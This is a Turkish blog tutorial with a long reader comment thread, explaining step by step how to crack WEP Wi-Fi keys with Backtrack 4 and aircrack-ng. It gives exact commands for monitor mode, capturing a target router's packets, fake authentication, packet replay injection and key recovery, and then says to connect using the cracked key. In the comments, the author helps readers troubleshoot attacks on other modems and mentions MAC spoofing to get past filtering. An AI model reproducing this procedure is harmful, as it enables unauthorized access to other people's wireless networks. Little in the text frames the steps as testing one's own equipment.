Eski sitede Backtrack 4 Beta ile WEP şifrelemesine sahip wireless şifrelerini kırmayı anlatmıştım. Yeni siteye geçince bu yazıları güncellemeye karar verdim.

Bu seferki yazımı, Backtrack 4 Final sürümü üzerinden anlatacağım. Anlatımdaki ikinci değişiklik ise artık Backtrack’ı VMware Player ile değil, direk sistemden boot ederek kullanacağız. Böylece açılışta direk linux çekirdeği yüklenecek ve işlemler biraz olsun daha hızlı yapılacak.

Öncelikle buraya tıklayarak Backtrack 4 Final’i nasıl Windows ile beraber kullanabileceğinizi öğrenin. Ardından bilgisayarınızı Backtrack ile başlatın. Bahsettiğim yazıyı okumanız önemli. Çünkü bu yazıda Windows ve Backtrack’i nasıl birlikte kullanabileceğinizi ve masaüstü arayüzüne geçişte karşılaşabileceğiniz sorunları anlattım. Lütfen biraz zamanınızı ayırıp ordaki yazıyı okuyun. Böylece aşağıdaki işlemlerde bir sorunla karşılaşmazsınız.

Not:
Bu şekilde yazdıklarım Linux komutları
Bu şekilde yazdıklarım kendi kartınızın MAC adresi
Bu şekilde yazdıklarım şifresini kıracağınız modemin MAC adresi

Backtrack’ı açtınız. Karşınıza konsol geldi. Konsola startx komutunu yazıp enter’a basın.
(startx yazdıktan sonra ekranınızla ilgili bir probleminiz olabilir. Çünkü benim netbook’un ekranı küçük olduğu için sorun çıkartıyor. Eğer laptop ya da pc tarzı bir bilgisayarınız varsa muhtemelen problem çıkarmayacaktır. Böyle bir sorun varsa gidermek için şu yazımı okuyabilirsiniz.)

KDE başladıktan sonra bir konsol açıp iwconfig komutunu yazıyoruz. Gelen ekranda kartımızı tanıyıp tanımadığına bakıyoruz.

iwconfig

Görüldüğü gibi en altta wlan0 ismiyle geçen bilgiler bizim kablosuz ağ kartımıza ait. Kartınıza göre bu isim değişebilir (eth0, ath0, …)
Bu tip bilgiler çıkmadıysa, BackTrack, sizin kablosuz ağ kartınızı tanımamış olabilir.
Daha sonra ifconfig wlan0 yazarak ağ kartının MAC adresini alalım. Bu MAC adresi bize ilerde lazım olacak.

ifconfig wlan0

HWaddr: xx:xx:xx:xx:xx:xx yazan bölüm bizim MAC adresimiz. Benim kartımın MAC adresi 00:17:c4:34:c7:de olarak çıktı. Sizin ekranınızda çıkan MAC adresini bir yere not edin. Daha sonra işimize yarayacak.

Sırada ağ kartımızı dinleme moduna ayarlamaya geldi. airmon-ng start wlan0 komutu ile kartımızı dinleme moduna ayarlıyoruz. Böylece havada uçuşan paketleri yakalayıp kırmaya çalışacağız.

airmon-ng start wlan0

Kartımız ayarlandı. Artık kartımızla ilgili işlemleri yaparken mon0 ismini kullanacağız.

Gelelim havadaki paketleri toparlamaya. Öncelikle hedefimizi seçmeliyiz.
airodump-ng -c 11 mon0 komutuyla 11. kanaldanyayınlanan paketleri yakalamaya başlıyoruz. Eğer -c parametresini yazmazsanız airodump-ng programı tüm kanalları teker teker dinleyecektir. Sizin kıracağınız modem başka bir kanaldan yayın yapıyor olabilir. Bu durumda 11 yerine 1, 3, 6 gibi başka kanal numaraları yazmanız gerekir.

Diyelim ki aşağıdaki gibi birşeyler çıktı.

Etraftaki iki tane ağ, WEP şifrelemesi sahip. Bizde zaten bunları kırmayı deneyeceğiz.
Tabloda üstteki kısım etraftaki modemleri gösteriyor. Alttaki kısım ise o modemlere bağlı olan kullanıcıları gösteriyor.
Ben TC yazan ağa saldıracağım için onun BSSID adresini(yani modemin MAC adresi) bir kenara yazıyorum: 00:18:39:2B:4C:98

Konsolda CTRL+Z tuşlarına basarak paket yakalamayı durdurup aynı pencereye bu sefer şu komutu yazıyorum:
airodump-ng -c 11 --bssid 00:18:39:2B:4C:98 --ivs -w deneme mon0

Bu komut sayesinde 11. kanaldaki, BSSID adresi 00:18:39:2B:4C:98 olan, data paketlerini toplayıp deneme ismindeki bir dosyaya kayıt etmeye başlıyoruz. Bu cümleyle üstteki komutuda açıklamış oldum 🙂

airodump-ng -c 11 --bssid 00:18:39:2B:4C:98 --ivs -w deneme mon0

Üstteki resme benzer bir ekran çıkması gerekli. Evet artık tüm paketler yakalanıp kayıt ediliyor. Ama bir sorun var: Ağa bağlı kimse yok!

Diyelim ki ağda birileri var;
Eğer ağa bağlı birileri olsaydı alt kısımda (hedef belirlerken gördüğümüz gibi) bağlı olan kişilerin MAC adresleri vb. bilgileri çıkardı. Bizde sadece yeteri kadar paket toplayıp kırma işlemine geçerdik.

Fakat ağımızda kimse yok. Bunun için ağda kendimiz trafik oluşturmalıyız. Az önceki paket topladığımız pencereyi kapatmayın. Sonraki işlemler için yeni bir konsol penceresi açın.

Bu pencereye şu komutu yazın:
aireplay-ng -1 2 -o 10 -q 10 -a 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0

Böylece ağda kendimiz bir trafik oluşturmaya başladık.

aireplay-ng -1 2 -o 10 -q 10 -a 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0

Her dört satırda bir gözüken gülen yüz işaretleri işlerin yolunda gittiğini gösteriyor bize 🙂 Bu trafikten elde edeceğimiz veriyi tekrar göndermemiz gerekli. Bunun için yeni bir konsol penceresi açıp şu komutları yazıyoruz:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b  00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0

Bu yazdığınız komut sonucunda bir kaç paket okunduktan sonra üstteki gibi bir ekranla karşılaşacaksınız. Bu aşamada y tuşuna basıp ardından  enter’a basın. Paket topladığımız pencerede paket sayısında gözle görülür bir artış olacaktır.Bundan sonrası bekleme kısmı.Yeteri kadar paket toplanmasını bekliyoruz.

Paket sayısı yavaş yavaş artıyor. Üst kısımdaki #Data yazan bölümde toplanan paket sayısı bizim için önemli. Yaklaşık 50000, 70000 paket topladığınızda kırma işlemi kısa sürede sonuç verecektir.
70000 paket topladınız diyelim. Tüm bu işlemler olurken toplanan paketleri kırmaya başlayabilirsiniz.

Yeni bir konsol penceresi açıyoruz,  aircrack-ng -a 1 deneme-01.ivs komutunu yazıyoruz. Bu komutla elimizdeki paketleri kırmaya başlayacağız.

Neden deneme-01.ivs yazdık? Çünkü paketleri kayıt etmeye başladığımız komutta hatırlarsanız -w deneme diye bir parametre kullanmıştık. Bu parametre kayıt edilecek dosyayı belirtiyordu. Backtrack, eski dosyalarla karışmaması için bunun sonuna -01 sayısını ekledi. Başka bir ağ kırarken aynı ismi kullanırsak bu sefer sonundaki numara -02 olacaktır. Kırma işleminde buna dikkat edin. Bence en güzeli her seferinde başka bir dosya ismi seçmek. Ben örneğimde dosya ismine mrt yazmıştım. Aşağıdaki resimde görüldüğü gibi mrt-01.ivs olarak kullandım.

Ve şifremiz çözüldü!

KEY FOUND! [  7D:5E:3E:68:22  ]  (ASCII:   }^>h”  )

Bulduğumuz şifre:     7D5E3E6822
Bu şifre hexadecimal sistemde bir sayılar bütünü.
ASCII hali parantez içerisinde verilmiş:    }^>h”
Ben kırarken örnek olarak kafadan sayı girdiğim için ASCII hali  böyle anlamsız çıktı doğal olarak.

İki şekilde de bağlanırken kullanabilirsiniz. İnternet bağlantısını Windows üzerinden kullanacaksanız bu şifreyi bir kenara yazın ya da aklınızda tutun.

Tek yapmanız gereken bilgisayarınızı yeniden başlatıp Windows’a geçmek, şifreyi yazmak ve bağlanmak 🙂
Şifreyi bulduğumuz konsol penceresi ile işimiz kalmadı. Bu pencereye reboot komutunu girerek bilgisayarınızı yeniden başlatabilirsiniz.

491 Yorum

 1. #1 Ahmet FAYDALI tarafından, tarihinde

  Çok çarpıcı bilgiler içeriyor hocam, inşallah hukuksal olarak bir paylaşım ağırlığı yoktur. Teşekkür ediyorum.

 2. #2 erhan unutmaz tarafından, tarihinde

  hocam eşekkür ederiz.neticede illa atak için değil defans içinde lazım bilgiler bunlar.yalnız wep değilde wpa kullanılıyor genellikle ve yanılmıyorsam şifrelemesi çok daha zor wpa nın.saygılarımla.

 3. #3 samet tarafından, tarihinde

  merhaba hocam benim sormak istediğim şudur
  Şimdi iwconfig yapıyorum bende çıkanlar şunlar:
  lo
  dummy0
  wmaster0
  wlan: bunun karsısında yakarıdakı gıbı kartımın ozellıklerı yazıyor.
  eth0
  Daha sonra kendı mac adresımı alıyorum ondan sonrakı komut dınlemeye de alıyorum airmon-ng start wlan0 yapıp.. sonra altında mon0 vs vs yazıyor buraya kadar normal.Daha sonra wireless aramak ıcın olan komutu yazıyorum(airodump-ng -c 11 mon0 olarak) ama bu komutu yazınca karsıma wireless aglar cıkmıyor.Su yazı yazıyor:no such file or directory…nerde yanlıs yapıyorum acaba kısa zamanda cevabını beklıyorum yardımcı olursanız sevınırım..

 4. #4 Murat tarafından, tarihinde

  @erhan unutmaz
  Evet aynen dediğiniz gibi. Bu bilgiler sadece saldırı amaçlı değil. Saldırıyı anladıktan sonra kendimizi korumamız daha kolay oluyor. Son zamanlarda WPA şifrelemesini kullanan bilinçli insanlar var. Onlarda deneme-yanılma yöntemiyle çözülüyor. Eski sitede anlatımı vardı. Henüz düzenleyip geçirmedim yeni siteye. En kısa zamanda onuda yapacağım.

  @samet
  Hangi model kart kullanıyorsunuz ve hangi Linux dağımını kullanıyorsunuz? Aircrack programının güncel sürümü mü yüklü?

 5. #5 samet tarafından, tarihinde

  Murat hocam ben slitaz ile denedim zaten aynı kapıya çıkıyorlar.Kartın markası da
  Intel(R) PRO/Wireless 3945ABG Ağ Bağlantısı
  bu olması gerek.

 6. #6 Murat tarafından, tarihinde

  @samet
  Aircrack genellikle INTEL marka kartlarda sorun çıkarıyor bildiğim kadarıyla. Ancak aircrack wiki’de ve internette iki sayfa buldum:
  http://www.aircrack-ng.org/doku.php?id=ipw3945
  http://www.maxi-pedia.com/how+to+crack+WEP+with+intel+PRO+wireless+3945ABG
  Belki yardımcı olabilir sorununa. Driver yüklemen gerekiyor anladığım kadarıyla.

 7. #7 gokhan tarafından, tarihinde

  Çok güzel bir rehber olmuş DNS tünellemeyi biliyorsanız onada bir rehber hazır layabilirmisiniz….

 8. #8 Murat tarafından, tarihinde

  @gokhan
  DNS tünelleme hakkında bir bilgim yok ne yazıkki 🙁 Ama DNS Poisoning hakkında bir yazı yazmayı düşünüyorum.

 9. #9 samet tarafından, tarihinde

  hocam şimdi bu backtrack indirip yapmaya calıstım.son kısımda yıne tıkandım..aircrack.. Kısmını yazıyorum toplanan verileri kırsın diye ama şu sorunu veriyor:
  Bash:aircrack:command not found
  Acaba kaydettıgım deneme.ivs mi bulamıyor yada yanlış mı kydettım bu kaydettıgım dosyayı bılgısayarda bır yerde gorebılırmıyız…yardımlarınızı beklıyorum

 10. #10 samet tarafından, tarihinde

  tmmdır hocam komutu ynlış yazmısım:)sımdı ugrasıorum sorun olursa donerım

 11. #11 samet tarafından, tarihinde

  Hocam şöyle bir sorun var şimdide.Sonuna kadar geldim ama o şifreleri kıracak paketleri olustururken (aireplay-ng kısmı) çok yavaş olusuyor paketler.Yarım saatte 15 20 tane ancak cıktı bende.Neden olabilir?Böyle olursa 3 5 günü alır şifreyi kırması 🙂

  • #12 Murat tarafından, tarihinde

   @samet
   Modemden modeme değişebiliyor. Bazı modemlerde paket oluşturma kısmı yapılamıyor. Nedenini bende bilmiyorum

 12. #13 Musa tarafından, tarihinde

  hocam ben aireplay-ng -1 2 -o 10 -q 10 -a 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0 komutunu yazınca başarılı bir fake authentication attack yapamıyorum lütfen yardım edin.Kartım intel wifi link 5100 agn

  • #14 Murat tarafından, tarihinde

   Başarılı olamamanızın nedeni benim kartımın ve modemimin MAC adresini girmeniz olabilir 🙂
   Kıracağınız kartın bilgilerini girip deneyiniz.
   aireplay-ng -1 2 -o 10 -q 10 -a (MODEM MAC ADRESİ) -h (KENDİ KARTINIZIN MAC ADRESİ) mon0

   • #15 serdar tarafından, tarihinde

    bütün herşeyi yapıyorum en son paketlerde hata diyor 5000 ivs diyor sebebi ne olabilir
    birde ben mon3 ile deniyorum

 13. #16 yasin tarafından, tarihinde

  slm hocam, benim sorunum şu: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0 BU komutu verdikten sonra READ XXXX PACKETS.. yazısı geliyor, bu sayı 10000’leri geçmesine rağmen ” use this packet ? ” yazısı gelmiyor, yani paket yaratmama rağmen kullanamıyorum. işlemleri sırasıyla yaptım.

 14. #17 yasin tarafından, tarihinde

  Bu arada sizin modem’in mac’ini yada sizin mac adresinizi kullanmıyorum, orada verdiğim komut sadece örnek 🙂

 15. #18 Murat tarafından, tarihinde

  öncesinde yazdığın aireplay-ng -1 2 -o 10 -q 10 -a 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0 komutu başarılı oluyor mu peki? Yani “association succesful :-)” mesajı geliyor mu?

  Not: MAC adreslerini yazıdan aldım. Kendi adresinle değiştirmeyi unutma

 16. #19 yasin tarafından, tarihinde

  Evet, o komut başarılı oluyor bir süre 😀 her 4 satır’da ” association succesful ” geliyor ama sonunda gülücük yok,komut 5-10 dakika sürüyor ve sonrasında hata veriyor, mac filitresi olabilir, modeme uzak olabilirsin gibisinden hata. ( gülücüğün olmaması BackTrack4’den kaynaklanıyor sanırım ) sizin yukarda çektiğiniz ekran foto’ları backtrack 3’e mi ait ?

  Gelelim Pardus’a, Pardus’da da aircrack-ng paketini kurup aynı komutları denedim, gülücükleri görebiliyordum, diğer komutta da ” use this packet ” i görüyordum, paketleri kullanıyordum amaaa, paket sayısında muhtesem bi artma olmasına rağmen #DATA ‘da herhangi bir artış olmuyordu.

 17. #20 yasin tarafından, tarihinde

  tamamdır, sorun ağ adaptörümdenmiş, ” intel wifi link 5100 agn ” bu karta sahip olanlar uğraşmasın bu işlerle, illa ki bi yerde sorun çıkartıyor. 😀

 18. #21 Murat tarafından, tarihinde

  @yasin
  😀 evet aircrack sürümleri intel kartlarla iyi anlaşamıyor ne yazıkki. geçmiş olsun artık. belkide uygun fiyatlı usb adaptörlerden alıp denersiniz.

 19. #22 Mehmet Ali tarafından, tarihinde

  merhaba hocam,
  benim de bir sorum olacak öncelikle kartımın modeli intel wi-fi link 4965AG
  paket toplamada bi sıkıntım yok 75000 pakete kadar topladım fakat aircrack bölümüne gelince kodu yazdıktan sonra sonra şöyle bi hata veriyor,

  Notice:you specified “-bssid”.Did you mean “–bssid” instead?
  Notice:channel range already given
  airodump-ng :invalid option — ‘v’
  “airodump-ng –help” for help

  yardımlarınızı bekliyorum
  tşkler.. iyi çalışmalar.

 20. #23 Murat tarafından, tarihinde

  @Mehmet Ali
  aircrack-ng komutunu doğru yazdığınıza emin misiniz? çünkü -eğer üsttekilere göre yaptıysanız- o komutta –bssid parametresi kullanılmıyor.
  aircrack komutunu doğru yazdığınızdan emin olun.

 21. #24 Mehmet Ali tarafından, tarihinde

  pardon hocam o hatayı paket toplamaya başlarken almıştım ö.diliyorum fakat aircrack de yapamamıştım ama onun hatasını not almamışım:) yukarıdaki airodump hatası için yardım ederseniz sevinirim..

  iyi çalışmalar.

  • #25 Murat tarafından, tarihinde

   @Mehmet Ali
   Sanırım yazıda temanın yazıtipinden kaynaklı olarak tek tire işareti gözüküyor. Aslında orda iki tane tire olacak.
   airodump-ng -c 11 --bssid 00:18:39:2B:4C:98 -ivs -w deneme mon0

 22. #26 Mehmet Ali tarafından, tarihinde

  tamam hocam airodump kısmını atlattım.bir kaç gün içinde aircrack için de bir kaç sorum olacak :))

  tşkler..
  iyi çalışmalar.

 23. #27 ahmet tarafından, tarihinde

  mrb hocam.
  malesef benim ağ kartını tanımıyor.
  Alfa 1000 mw kullanıyorum 1 hafta oldu alalı fakat iwconfig yazdığımda sadece bunlar görünüyor.

  root@bt:~# iwconfig
  lo no wireless extensions.

  eth0 no wireless extensions.

  root@bt:~#

  Aynı zamanda vmware üzerinden aircrack ile deneme yapmak istedim oda olmadı. Normalde ağ görüyor ve kablosuzlara bağlanıyor fakat vmware i çalıştırdığım zaman cihazın üzerindeki ışık sönüyor ve donanım çıkarıldı uyarısı veriyor vmware i kapattığımda tekrar düzeliyor birşey anlamadım, yardımlarınızı bekliyorum.

 24. #28 Murat tarafından, tarihinde

  @ahmet
  vmware kullandığınızda bilgisayarınızdaki ağ kartını çıkartıp sanal bilgisayara takmış oluyorsunuz. Bu yüzden kendi bilgisayarınızdan çıkarıldı uyarısı görmeniz normal.
  Alfa model ağ kartlarının çalışıp çalışmadığı hakkında bir bilgim yok. Belki uygun sürücülerini bulup yüklerseniz olabilir.
  Ekleme: Galiba çalışıyormuş

 25. #29 ahmet tarafından, tarihinde

  Hocam ağ kartım çalışıyor normalde şifresiz ağlarda nete bağlanıyor , ama vmware açınca işte sorun oluyor. Uygun sürücü yükleme derken, sürücüyü vmware ye mi yoksa normal pc e mi tanıtıcam tam olarak anlamadım orayı.
  Teşekkürler.

 26. #30 Murat tarafından, tarihinde

  @ahmet
  Ağ kartın windows ortamında tanınıyordur. Fakat Linux tanımıyordur. Bu yüzden linux üzerine sürücüsünü yüklemen gerekebilir. İnternette bazıları çalışıyor demiş Alfa 1000mw için. Benim öyle bir kartım olmadığı için çalışıp çalışmadığı hakkında bir bilgim yok.

 27. #31 ahmet tarafından, tarihinde

  Hocam çok teşekkürler, kusura bakmayın linux ortamında ağ kartımı nasıl tanıtacağımı bilmiyorum yardımcı olabilirmisiniz bu konuda, veya herhangi bir link yada dökümanda olabilir.
  Teşekkürler.

 28. #32 Murat tarafından, tarihinde

  @ahmet
  O konuda benim de bilgim yok malesef.Ayrıca elimde döküman da yok 🙁
  Tanıtmadan önce Alfa 1000mw’ın çalışıp çalışmadığını araştırmalısınız bence.

 29. #33 ahmet tarafından, tarihinde

  Hocam peki, normalde ağ görüp şifresiz olanlara sorunsuz ve yüksek sinyalde bağlanıyor, bu zaten iyi çalışıyor anlamına gelmez mi ? Cihazın tam modeli bu: 1000mw Alfa AWUS036H

 30. #34 Murat tarafından, tarihinde

  @ahmet
  Şifresi ağları windows’ta mı yoksa linux’ta mı görüyor?
  Windows’ta görüyorsa zaten bir problem yok. Linuxta görüyorsa sizin ağ kartınızı tanıyor demektir.

 31. #35 ahmet tarafından, tarihinde

  Hocam windowsta görüyor, amacım wep kırmayı denemek fakat dediğim gibi vmware i açtığım zaman çalışmıyor.

 32. #36 ahmet tarafından, tarihinde

  Hocam düşündümde acaba bundan olabilir mi ? Leptop kullanıyorum orj ağ kartım atheros acaba vmware player den aircrack e girerken iki ağ kartı arasında seçim yapamayıp bir çakışma yapıyor ve bundan dolayı alfa yı görmüyor olabilir mi ? gerçi iwconfig komutu yazınca normal ağ kartımıda görmüyor.

 33. #37 Murat tarafından, tarihinde

  @ahmet
  wmware player’ın al köşesinde bilgisayarınızdaki USB aygıtları, network kartlarını,ses kartlarını sanal bilgisayara takıp çıkartmayı sağlayan küçük ikonları var. Oradan sanal bilgisayara takmak istediğiniz aygıt’ı eklediğinizde, Windows’tan çıkartılıp sanal bilgisayara takılmış olur.
  Tahmin edeceğiniz gibi bir aygıtı aynı anda iki bilgisayara takamazsınız. Bu da böyle bir şey. Sanal bilgisayara taktığınızda windows’ta gözükmemesi doğal.

  Eğer ordaki ikonlardan sadece Alfa ağ kartınızı sanal bilgisayara takarsanız iwconfig ya da airmon-ng komutunda sadece Alfa ile işlem yaparsınız. Atheros kartınızla sanal bilgisayara bulaştırmamış olursunuz.

 34. #38 ahmet tarafından, tarihinde

  Hocam teşekkürler denemeler yapacağım inşallah düzelir.

 35. #39 Ahmet tarafından, tarihinde

  Hocam sorunu çözdüm, dediğiniz gibi xp de yüklü ama linux ta yüklenmemişti driver lar.
  Linuxta da tanıttım sorunu çözdüm.
  Teşekkürler.

 36. #40 Neyzen Burak tarafından, tarihinde

  Öncelikle selamlar.

  Ben şu aşamaya : aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0 geldikten sonra packet read işlemi hiç bitmiyor. Yani ;

  aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:08:5C:FE:E5:13 -h 00:08:5C:FE:E5:13 mon0
  The interface MAC (00:23:CD:BD:A1:96) doesn’t match the specified MAC (-h).
  ifconfig mon0 hw ether 00:08:5C:FE:E5:13
  42851 packets…

  Uzun süre böyle kalıyor. Packetler artıyor ama iş neticeye bağlanmıyor, nası yapıcaz?

 37. #41 yunus tarafından, tarihinde

  paketler 50000 veya 70000 bin olcak bn 7 saatte kırdım beklemeniz gerekli

 38. #42 oğuzhan tarafından, tarihinde

  iyi günler. vm üzerinde deniyorum. bende sahte trafik oluşturmaya çalışırken gülen yüz gelmesi gereken yerde birşey alamıyorum.

  The interface MAC (00:60:B3:3B:83:EF) doesn’t match the specified MAC (-h).
  ifconfig mon0 hw ether 00:26:B0:D3:81:4A
  19:42:13 Waiting for beacon frame (BSSID: 00:18:39:22:2C:8F) on channel 11

  19:42:13 Sending Authentication Request (Open System)

  .
  .
  .

  19:42:43 Sending Authentication Request (Open System)
  Attack was unsuccessful. Possible reasons:

  * Perhaps MAC address filtering is enabled.
  * Check that the BSSID (-a option) is correct.
  * Try to change the number of packets (-o option).
  * The driver/card doesn’t support injection.
  * This attack sometimes fails against some APs.
  * The card is not on the same channel as the AP.
  * You’re too far from the AP. Get closer, or lower
  the transmit rate.

  .. olan kısmı ben koydum çıktıda yok öyle birşey. acaba mac address filtrelemesinden mi dedim çünkü gözümde ilk çarpan oydu. o sırada başka bir mac giriş yapmaya çalıştı. onu kopyaladım macchanger la değiştirdim mac addressimi. değiştirdiğim address çıkış yapmıştı. yinede aynı hatayı aldım. aygıt yöneticisinden atheros chipsetli olduğunu buldum. yinede adaptörümle ilgili olabilir mi?

  • #43 Murat tarafından, tarihinde

   Bazı modemlerde o gülen yüzü göremediğin olabilir. Modemden kaynaklı birşeydir. Aslında önceden aireplay-ng ile test edilebilir. Ama bu yaptığımızda bir test yöntemi. Zaten ağda birileri varsa trafik oluşturmaya gerek yok. Paketleri tekrar gönderip gereken trafiği oluşturabiliriz.

  • #44 gurcan tarafından, tarihinde

   hocam aynı sorun bende var.. çözüm bulabildin mi???

 39. #45 oğuzhan tarafından, tarihinde

  ama data artmıyor bu çıktıyı alırken bile.

  • #46 Murat tarafından, tarihinde

   zaten data artmaz bu durumda. modeme bağlaı başka bir kullanıcı varsa bekleyeceksiniz birşeyler indirsin diye.

 40. #47 oğuzhan tarafından, tarihinde

  başka bir modemde denedim. çalıştı şifreyi elde ettim. başka birinde denedim. bu sefer paketleri tekrar gönderirken paket okumaya başlıyor. 300k kadar paket okusa bile gönderemiyorum. paket önbelleği gibi birşeyvarsa nasıl temizleyebilirim bunu?

 41. #48 yLdrm tarafından, tarihinde

  Selam arkadaslar benim Sorum sizlere daha once web sifrelerini birkackez kirdim ama yeni bir laptop aldim Atheros marka ag karti var backtrack 3 cd versiyonun kullaniyorum ama karti gormuyor ne yapabilirim yardimci olabilirmisiniz?

 42. #49 yLdrm tarafından, tarihinde

  Merhaba, arkadaslar yeni bir leptop aldim. Atheros AR8151 marka cipseti var Backtrack 3 live cd kullaniyorum ve backtrack wirelles taninmadigi icin internete giremiyorum driverlari nasil bulabilir ve yukleyebilirim yukleme konusunda hic bilgim yok yardimci olabilirmisiniz lutfen simdiden yardim ve gorusleriniz icin tesekkur ederim.

 43. #50 oğuzhan tarafından, tarihinde

  atheros kartlarda sorun olabiliyor galiba. bence intel chipsetli bir usb adaptor deneyin.

 44. #51 yLdrm tarafından, tarihinde

  @oğuzhan
  d-link usb wirelles adaptorum var iki tane ama birisi taninmiyor digeri ise sorunlu baglanti tam veri toplamaya baslayinca kesiliyor. En iyi laptopun wirellesi cekiyor o yuzdende sifre kirma islemini laptopla yapmak istiyorum digerinde kac kez denememe ragmen ya data alamiyorum yada tam data toplamaya basladigimda baglanti kopuyor. atheros chipsetini nasil tanitabilirim yardimci olabilrseniz sevinirim.

 45. #52 yLdrm tarafından, tarihinde

  Bana kimse yardimci olamayacakmi yani?

 46. #53 yLdrm tarafından, tarihinde

  Ahmet :Hocam sorunu çözdüm, dediğiniz gibi xp de yüklü ama linux ta yüklenmemişti driver lar.Linuxta da tanıttım sorunu çözdüm.Teşekkürler.

  oğuzhan :atheros kartlarda sorun olabiliyor galiba. bence intel chipsetli bir usb adaptor deneyin.

  Ahmet senin sorununla benimkisi ayni gb birsey ben atherosu nasil linuxa tanitabilirim biraz yardim edebilirmisin?

 47. #54 Murat tarafından, tarihinde

  @yLdrm
  Atheros’un nasıl tanıtılacağı hakkında bir bilgim yok. Fakat sorunlu olduğunu duymuştum. Intel’inde bazı kartlarını tanımadığı oluyor. Bazılarını tanıyor. Hangi modeller olduğu hakkında bir bilgim yok.

  Son 1 aydır staj ve tatilde olduğum için pek cevap veremiyorum yorumlara.

 48. #55 mt_AN tarafından, tarihinde

  hocam pardustaki aircrack’I nasıl kullanırım bilen varmı

  • #56 Murat tarafından, tarihinde

   Bu sayfada anlatıldığı şekilde kullanabilirsiniz.

 49. #57 mert tarafından, tarihinde

  Hocam bunadımların hepsini yapıyorum… Modemde kullanıcı olmadığı için modeme bağlantıda oluşturyorum 4 satırda bir gülücükte geliyor… Fakay #data da hiç bir artış olmuyor… Wireless kartımın markası Realtek 8185 modemin sinyal gücüde orta.. Ayrıca aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0 komunutunu da girdigimde use this packet gibi bir soruda gelmiyor direk read packets diyor…( bu arada modemin bssid sini ve kendi wirelesss kartımın adresini de doğru yazıyorum)

 50. #58 burak tarafından, tarihinde

  Merhaba Murat Hocam
  Benim Sorunum Şu
  Herşeyi bitiriyorum.
  Bekleme kısmında data sn 1 bile artmıyor…
  Trafik Hızlandırma yapıyorum ama yine artmıyor.
  Paket 70000 oluyor data 300 de kalıyor.
  şimdiden Teşekkürler

 51. #59 yLdrm tarafından, tarihinde

  Murat kardes peki baglanti kesilmesine sebeb nedir bu konuda yardimci olabilirmisin Lutfen

 52. #60 Murat tarafından, tarihinde

  @mert ve @burak
  “use this packet” yazısı gelmiyorsa daha paketi bulamamıştır 🙁 Modemden kaynaklı birşey de olabilir. Sanırım burak’ın sorunuda bu yüzden.

  @yLdrm
  Modeme çok uzak olabilirsiniz, modemle aranızda farklı bir engel olabilir. Daha yakınlaşıp deneyin.

 53. #61 NeyzenBurak tarafından, tarihinde

  Tamam, ben o problemi çözdüm. başka bir modemi deniyorm ama ondada packet toplamıyor. Data sürekli 1 de kalıyor. nasıl yapabiliriz bunu?

 54. #62 RooTWorM tarafından, tarihinde

  aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0

  bu komutla paket okuyup devam ediyor hiç diğer aşama gelmiyor? kodu uyarladım kendime paket sayısı devamlı artıyor ama sonuç yok?

 55. #63 ONURSAL tarafından, tarihinde

  hocam wep şifreleme de yeni konsol açıp

  aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0

  bu komutu eklediğimde paket okuyup devam ediyor hiç diğer aşama(use this packet sorusu) gelmiyor?
  kodu uyarladım kendime paket sayısı devamlı artıyor ama sonuç yok?
  yardım eder misiniz?

 56. #64 hüseyin tarafından, tarihinde

  hocambn pardusta yapıyorum ”airmon-ng start wlan0” komutunu girdigimde run is root diye birsey cikıyor ne yapmalıyım yardımm edebilirmisinizz

 57. #65 Murat tarafından, tarihinde

  sudo airmon-ng start wlan0 şeklinde yazmayı deneyin. Her komutun başına sudo yazarsanız yönetici olarak çalıştırabilirsiniz.

 58. #66 sebelebettinkam tarafından, tarihinde

  Dostum Bir Sorum olacak bu mac adresleri hep sabitmi yani değişmezmi

  • #67 Murat tarafından, tarihinde

   Her kablolu veya kablosuz ağ (zaten kablosuz ağ kartları da bir bakıma kablolu ağ kartıdır. tam bilmiyorum fakat firewire kartlarınında mac adresleri olabilir) kartının kendine ait bir MAC adresi vardır. Fabrika çıkışında ayarlanır. Linux altında çok basit bir programla, windows altında ise başka bir programla değiştirilebilir.

   Böylece MAC filtrelemesi olan ağlara saldırırken önceden tanımlı bir kartmış gibi gösterebiliriz. Ama benim başıma daha önce hiç gelmedi.

 59. #68 xx tarafından, tarihinde

  wep şifresi kırmada son aşamaya geliyorum ancak paket toplama çok yavaş ilerliyor hocam sebebi nedir? saygılar

  • #69 Murat tarafından, tarihinde

   Her modemde paketleri tekrar gönderip kendimize bir paket akışı sağlayamıyoruz. Bazı modemlerde sadece bağlı olan kişinin paket gönderme-alma işlemim yapmasını beklemeliyiz. Birazcık sabır sadece 🙂

 60. #70 aziz tarafından, tarihinde

  hocam benim sorum su:
  şifreyi buldum fakat hex kodunda yani A1:B2: ŞEKLİNDE YAZIYOR. bunları nasıl normal şifreye çevirebiliriz..saygılar

  • #71 Murat tarafından, tarihinde

   Hex olarak kalmasında bir problem yok. Zaten yan tarafında ascii hali de mecvut. Benim tavsiyem giriş yaparken şifreyi hex olarak yazmanız. Çünkü ascii yazarken bazı karakterlerde sorun çıkabilir.
   Tabi aradaki iki noktayı kaldırmayı unutmayın.
   A1B2C3D4E5 şeklinde yazarsanız bağlanacaktır.

 61. #72 rıfat tarafından, tarihinde

